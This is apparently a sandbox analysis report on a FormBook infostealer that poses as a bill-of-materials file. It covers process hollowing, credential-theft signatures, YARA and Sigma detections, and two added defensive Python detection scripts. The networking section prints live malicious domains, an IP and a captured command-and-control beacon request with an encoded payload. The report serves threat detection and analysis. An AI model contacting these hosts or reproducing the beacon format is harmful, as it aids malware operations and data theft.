
Windows Analysis Report
Copy of 01. Bill of Material - 705.exe

Overview

General Information

Sample name: Copy of 01. Bill of Material - 705.exe
Analysis ID: 1497886
MD5: 806f72c900778deccf64f8a4ec8cdbc9
SHA1: d2bcb914eae4d432183d980ea19bee69f4b2d4fe
SHA256: 642475685812ab7bbc355bb0012722266572aeadc8af18e4a4b0498229deb385
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc.)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name differs from the original file name recorded in the version info
Sigma detected: Suspicious RASdial Activity
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • Copy of 01. Bill of Material - 705.exe (PID: 1096 cmdline: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe" MD5: 806F72C900778DECCF64F8A4EC8CDBC9)
    • svchost.exe (PID: 6492 cmdline: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • GQXHQykfhUHHi.exe (PID: 6520 cmdline: "C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rasdial.exe (PID: 3136 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)
          • GQXHQykfhUHHi.exe (PID: 6008 cmdline: "C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5952 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Reading the tree: the child at PID 6492 runs the image C:\Windows\SysWOW64\svchost.exe but carries the sample's own path as its command line (see the Sigma events below), the usual sign of a hollowed decoy process. GQXHQykfhUHHi.exe is not a file dropped by the sample: the binary strings under AV Detection give it the PDB path R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, i.e. it is the sandbox's FakeChrome decoy browser that FormBook injected into. That injected code then started rasdial.exe, and the Yara matches below land in the memory of svchost.exe (process 2), rasdial.exe (process 6) and both GQXHQykfhUHHi.exe instances (processes 4 and 7).
No configs have been found
Memory dumps

Source | Rule | Description | Author
00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2bd40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x140bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
[11 further entries not shown in this view]
Unpacked PEs

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2e053:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x163d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  Strings:
  • 0x2ee53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x171d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
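The two hex strings of Windows_Trojan_Formbook_1112e116 that fired above can be reproduced without a YARA install. The block below is an added example, not part of the Joe Sandbox report or of the rule's published source: it scans a buffer for the same two byte sequences, mirrors an "all of them" condition, and emits an equivalent YARA rule text. The memory dump it scans is constructed here (zero-filled, with the strings planted at the offsets the report lists for process 6), and the scanner reports offsets relative to whatever buffer it is handed, which is why the report shows the same strings at 0x2bd40/0x140bf in the memory dump but at 0x2e053/0x163d2 in the unpacked PE and 0x2ee53/0x171d2 in its raw view (the last two differ by a constant 0xe00, consistent with file-versus-virtual section layout).

```python
"""Re-implementation of the two Windows_Trojan_Formbook_1112e116 strings as a
plain byte scanner plus a YARA-rule emitter. Added example; the "dump" it scans
is constructed, not a real process memory dump."""
from typing import Dict, List

# The two hex strings exactly as listed in the report's Yara table.
FORMBOOK_STRINGS = {
    "$a2": "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55",
    "$a3": "1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01",
}
PATTERNS = {name: bytes.fromhex(hexstr) for name, hexstr in FORMBOOK_STRINGS.items()}


def scan(buf: bytes, patterns: Dict[str, bytes] = PATTERNS) -> Dict[str, List[int]]:
    """Return every offset at which each pattern occurs in buf (overlaps included)."""
    hits: Dict[str, List[int]] = {}
    for name, pat in patterns.items():
        offsets, start = [], 0
        while (idx := buf.find(pat, start)) != -1:
            offsets.append(idx)
            start = idx + 1
        hits[name] = offsets
    return hits


def matches(buf: bytes, patterns: Dict[str, bytes] = PATTERNS, require_all: bool = True) -> bool:
    """Mirror a YARA condition of 'all of them' (default) or 'any of them'."""
    found = [bool(offs) for offs in scan(buf, patterns).values()]
    return all(found) if require_all else any(found)


def to_yara(rule_name: str, strings: Dict[str, str], condition: str = "all of them") -> str:
    """Emit YARA rule text equivalent to the strings/condition used by scan()/matches()."""
    body = "\n".join(f"        {name} = {{ {hexstr} }}" for name, hexstr in strings.items())
    return (f"rule {rule_name}\n{{\n    strings:\n{body}\n"
            f"    condition:\n        {condition}\n}}\n")


def build_sample_dump(size: int = 0x30000) -> bytes:
    """Constructed stand-in for the 0x800000 region of process 6: zero-filled,
    with the two strings planted at the offsets the report lists (0x2bd40, 0x140bf)."""
    buf = bytearray(size)
    buf[0x2BD40:0x2BD40 + len(PATTERNS["$a2"])] = PATTERNS["$a2"]
    buf[0x140BF:0x140BF + len(PATTERNS["$a3"])] = PATTERNS["$a3"]
    return bytes(buf)


if __name__ == "__main__":
    dump = build_sample_dump()
    for name, offs in scan(dump).items():
        print(name, [hex(o) for o in offs])
    print("rule fires:", matches(dump))
    print(to_yara("Windows_Trojan_Formbook_1112e116_strings_only", FORMBOOK_STRINGS))
```

Feed scan() the bytes of a real .sdmp or unpacked PE (open(path, "rb").read()) to confirm the report's offsets; matches() with require_all=False is the looser "any of them" condition and will fire on a single string, so keep the default when the goal is a verdict rather than triage.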

System Summary

Source: Process started | Author: juju4 (Sigma: Suspicious RASdial Activity)
  Command: "C:\Windows\SysWOW64\rasdial.exe"
  CommandLine: "C:\Windows\SysWOW64\rasdial.exe"
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\rasdial.exe
  NewProcessName: C:\Windows\SysWOW64\rasdial.exe
  OriginalFileName: C:\Windows\SysWOW64\rasdial.exe
  ParentCommandLine: "C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe"
  ParentImage: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
  ParentProcessId: 6520
  ParentProcessName: GQXHQykfhUHHi.exe
  ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe"
  ProcessId: 3136
  ProcessName: rasdial.exe
Source: Process started | Author: Florian Roth (Nextron Systems) (Sigma: Uncommon Svchost Parent Process)
  Command: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  CommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\svchost.exe
  NewProcessName: C:\Windows\SysWOW64\svchost.exe
  OriginalFileName: C:\Windows\SysWOW64\svchost.exe
  ParentCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  ParentImage: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
  ParentProcessId: 1096
  ParentProcessName: Copy of 01. Bill of Material - 705.exe
  ProcessCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  ProcessId: 6492
  ProcessName: svchost.exe
Source: Process started | Author: vburov
  Command: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  CommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  CommandLine|base64offset|contains: (empty)
  Image: C:\Windows\SysWOW64\svchost.exe
  NewProcessName: C:\Windows\SysWOW64\svchost.exe
  OriginalFileName: C:\Windows\SysWOW64\svchost.exe
  ParentCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  ParentImage: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe
  ParentProcessId: 1096
  ParentProcessName: Copy of 01. Bill of Material - 705.exe
  ProcessCommandLine: "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
  ProcessId: 6492
  ProcessName: svchost.exe
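The three events above carry two tells that are easy to encode as process-creation checks: an svchost.exe whose parent is not the service control manager, and a process whose image (svchost.exe) does not match the executable named in its own command line (the sample's path). The block below is an added example, not the Sigma rules' own logic and not from the report: it runs a simplified version of those checks, plus a heuristic for rasdial.exe started from outside C:\Windows, over event records constructed from the report's process tree. The parent of PID 1096 is not in the report, so explorer.exe is an assumption, and the svchost parent allow-list is deliberately trimmed to services.exe (the real rule allows several more).

```python
"""Simplified process-creation checks modelled on the Sigma hits in the report:
uncommon svchost.exe parent, image/command-line mismatch, rasdial.exe with a
non-Windows parent. Added example; events are constructed from the report."""
import ntpath
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
DECOY = (r"C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE"
         r"\GQXHQykfhUHHi.exe")

# Constructed process-creation events (Sysmon EID 1 / 4688 shape) mirroring the
# report's tree. The parent of PID 1096 is not in the report; explorer.exe is assumed.
EVENTS: List[Dict[str, object]] = [
    {"pid": 1096, "image": SAMPLE, "cmdline": f'"{SAMPLE}"',
     "parent_image": r"C:\Windows\explorer.exe"},
    {"pid": 6492, "image": r"C:\Windows\SysWOW64\svchost.exe", "cmdline": f'"{SAMPLE}"',
     "parent_image": SAMPLE},
    {"pid": 6520, "image": DECOY, "cmdline": f'"{DECOY}"',
     "parent_image": r"C:\Windows\SysWOW64\svchost.exe"},
    {"pid": 3136, "image": r"C:\Windows\SysWOW64\rasdial.exe",
     "cmdline": r'"C:\Windows\SysWOW64\rasdial.exe"', "parent_image": DECOY},
    # Benign baseline: a service host started by the SCM with a normal -k command line.
    {"pid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "parent_image": r"C:\Windows\System32\services.exe"},
]

# Assumption: trimmed allow-list. svchost.exe is normally started by services.exe.
SVCHOST_PARENTS_OK = {"services.exe"}


def first_token(cmdline: str) -> str:
    """Executable path named by a Windows command line (quoted or unquoted)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.find('"', 1)]
    return cmdline.split(" ", 1)[0]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()


def check_event(ev: Dict[str, object]) -> List[str]:
    findings: List[str] = []
    img, parent = base(str(ev["image"])), base(str(ev["parent_image"]))
    if img == "svchost.exe" and parent not in SVCHOST_PARENTS_OK:
        findings.append("svchost-uncommon-parent")
    # Hollowing tell: the image on disk is not the executable the command line names.
    if base(first_token(str(ev["cmdline"]))) != img:
        findings.append("cmdline-image-mismatch")
    if img == "rasdial.exe" and not str(ev["parent_image"]).lower().startswith("c:\\windows\\"):
        findings.append("rasdial-nonwindows-parent")
    return findings


def evaluate(events: List[Dict[str, object]]) -> List[Tuple[int, str]]:
    """(pid, finding) pairs for every event that trips at least one check."""
    return [(int(ev["pid"]), f) for ev in events for f in check_event(ev)]


if __name__ == "__main__":
    for pid, finding in evaluate(EVENTS):
        print(pid, finding)
```

The image/command-line mismatch is the strongest of the three signals here: a legitimate svchost.exe always names itself in its command line, whereas a process created with a different lpApplicationName than the command line it is handed (what PID 6492 shows) has no benign reason to exist on a workstation.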
            No Suricata rule has matched


AV Detection

Source: Copy of 01. Bill of Material - 705.exe | ReversingLabs: Detection: 39%
Source: Copy of 01. Bill of Material - 705.exe | Virustotal: Detection: 29%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Copy of 01. Bill of Material - 705.exe | Joe Sandbox ML: detected
Source: Copy of 01. Bill of Material - 705.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GQXHQykfhUHHi.exe, 00000004.00000002.4644705252.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4642079066.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0039DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0036C2A2 FindFirstFileExW
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003A68EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0039D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_0039D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003A5C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_0081C420 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_00809B60 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_0080E109 4x nop then pop edi
Source: C:\Windows\SysWOW64\rasdial.exe | Code function: 6_2_045C04DF 4x nop then mov ebx, 00000004h

            Networking

Source: DNS query: www.jaxo.xyz
Source: Joe Sandbox View | IP Address: 103.224.182.242
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (15 occurrences)
Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe | Code function: 0_2_003ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  date: Fri, 23 Aug 2024 06:27:18 GMT
  server: Apache
  set-cookie: __tad=1724394438.1131553; expires=Mon, 21-Aug-2034 06:27:18 GMT; Max-Age=315360000
  vary: Accept-Encoding
  content-encoding: gzip
  content-length: 577
  content-type: text/html; charset=UTF-8
  connection: close
  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f 9c 30 10 3d 2f bf 62 44 0e b0 4a 83 37 4a 9b 48 bb 40 0f 95 2a b5 ea a1 4a da 73 e5 98 61 71 02 36 b5 87 fd 50 b4 ff bd 63 96 7c b4 95 9a fa 02 1e bf 37 6f de 30 26 6f a8 6b cb 28 6f 50 56 fc 20 4d 2d 96 bb da ba a1 cb 08 55 93 8b 63 28 ca bd 72 ba 27 a0 7d 8f 45 4c b8 23 71 27 37 f2 18 8d c1 3b 55 c4 e2 ce 8b 5a 9b 35 ba de 69 43 42 eb 1a b3 4e 9b ec ce c7 65 2e 8e d8 d7 52 95 d1 46 3a 70 58 69 87 8a 7e b4 da dc 43 01 49 43 d4 2f 85 d8 6e b7 d9 8b f2 c4 e5 db ab 9d 78 9f ac a2 48 08 b8 41 02 09 a4 3b b4 03 81 ad e1 62 b1 80 4e 2b 67 3d 2a 6b 2a 0f 64 01 77 a8 06 42 06 3e 6a 80 ae 81 1a 84 17 a5 43 ef 6c a7 3d c7 a4 6e 3d b0 20 78 db 21 53 a4 b7 26 aa 07 a3 48 5b c3 c7 6d 7b 2b d5 fd f5 94 2a 9d c3 43 34 db 6a 53 d9 6d d6 5a 25 03 2a 73 d8 b7 52 61 fa 9b a9 d3 a4 ee 8b b3 ab 64 be 8a 0e 51 44 6e 1f 98 5c a5 27 70 95 fb 36 99 28 c0 23 4d 9b f4 4f b5 37 c1 20 f3 67 a1 63 75 ff 75 aa b9 80 8f cf 4e 3e df 70 1d b2 4a 1f 3a 6b 34 59 0e ad 97 a1 6c 8f 87 c0 7c 62 45 b3 59 c6 4d 30 69 dd 43 51 72 b6 6c 8d 6c 67 fe 14 e7 97 99 43 3f b4 14 ce 1f 20 ec 27 61 17 ea 0c 76 92 d3 23 22 db 68 1f c4 3e 55 ab 11 a6 5a 94 8f 96 d2 67 77 f3 e3 e9 ff b5 2b c8 8c 84 50 f7 01 18 ab 9a 14 9d 1b 3b fe f7 77 18 bb fa 72 e6 68 cf 63 0c b7 b6 e2 46 43 c0 ae 9d 1d 4c b5 3c 39 5f 9c ab 8b 4b 38 00 a3 47 10 d3 a6 eb 30 a2 6f d7 ca b6 d6 15 f1 49 3d ae 18 c2 c8 f2 76 31 2e 1e d8 bc d2 1b 18 b9 45 52 69 cf d5 ef 97 60 ac c1 55 52 e6 12 1a 87 75 f1 ef 01 0e a3 70 91 94 1f 5a ad ee a1 41 87 e3 a4 1a 42 97 0b c9 57 87 05 58 c6 d8 c9 4e de 21 71 5e ce 78 86 3f 07 bd 29 62 96 e0 d6 37 31 f0 04 11 13 8b 78 b1 82 ef d7 5f 8a 57 65 df 85 ab f9 94 99 bd 07 d3 63 0f c2 9f e1 17 f0 d7 93 65 20 04 00 00
  Data Ascii: (gzip-compressed body; see Data Raw)
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  date: Fri, 23 Aug 2024 06:27:20 GMT
  server: Apache
  set-cookie: __tad=1724394440.4608183; expires=Mon, 21-Aug-2034 06:27:20 GMT; Max-Age=315360000
  vary: Accept-Encoding
  content-encoding: gzip
  content-length: 577
  content-type: text/html; charset=UTF-8
  connection: close
  Data Raw: same 577-byte gzip stream as the first response above
  Data Ascii: (gzip-compressed body; see Data Raw)
Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK
  date: Fri, 23 Aug 2024 06:27:23 GMT
  server: Apache
  set-cookie: __tad=1724394443.6196117; expires=Mon, 21-Aug-2034 06:27:23 GMT; Max-Age=315360000
  vary: Accept-Encoding
  content-encoding: gzip
  content-length: 577
  content-type: text/html; charset=UTF-8
  connection: close
  Data Raw: same 577-byte gzip stream as the first response above
  Data Ascii: (gzip-compressed body; see Data Raw)
All of the following requests (Source: global traffic, HTTP traffic detected) carry the same header set and differ only in path, query blob and Host:
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Connection: close
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36

GET /v1m8/?Xn70_=MbosJJuAq5eUJ0hPiGjwIN1TLoIAcga9hjG8r0T6YD1U+30HrEc2VhBeVjG8H8kt/NUkGofbq5WDcsdH4YqjssfFBuX2F/io1ZFH4zFtNPAFxgqhGgKh1aBi0mxPguqsni1l53c=&mV=ZpN4DLSXOzy8qX HTTP/1.1
  Host: www.weep.site
